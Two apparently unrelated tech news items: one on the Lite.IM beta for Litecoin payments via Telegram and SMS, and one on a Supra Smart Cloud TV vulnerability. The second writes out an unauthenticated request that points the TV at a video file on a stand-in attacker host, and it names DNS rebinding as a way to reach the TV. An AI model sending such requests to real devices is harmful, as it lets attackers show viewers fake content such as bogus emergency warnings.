Lite.IM Beta to be Released

Lite.IM will allow users to interact with Litecoin blockchain using text commands through a special API-system
09 August 2018   1645

Developers of the Zulu Republic blockchain project presented Lite.IM software that allows users to make transactions in the Litecoin network using SMS messages and the Telegram messenger.

Zulu Republic is convinced that Telegram is the safest messenger and provides all the necessary opportunities for testing the concept before launching SMS payments.

Representatives of the project emphasize that a lot of people live in countries with limited access to the Internet, under conditions of strict censorship by political regimes, without access to financial services. In addition, 64% of the world's population owns mobile phones, but only 33% have smartphones. This is the reason why Zulu Republic is convinced of the need to link SMS messages and Litecoin blockchain, not relying on the availability of the Internet.

By opening the world of cryptocurrency to these underserved and vulnerable populations, we aim to provide a degree of financial agency, autonomy, and (perhaps most importantly) security that they’ve been denied up until now.
 

Zulu Republic

Lite.IM will allow users to interact with Litecoin blockchain using text commands through a special API-system. At the moment the community already has the opportunity to use Telegram-bot to check balances and send Litecoin to LTC-addresses or e-mail. The solution is written on JavaScript. More info is available at GitHub.

The creator of "digital silver" Charlie Lee is convinced that the bear market allows us to focus on developing solutions for mass adoption of technology. 

Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   309

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).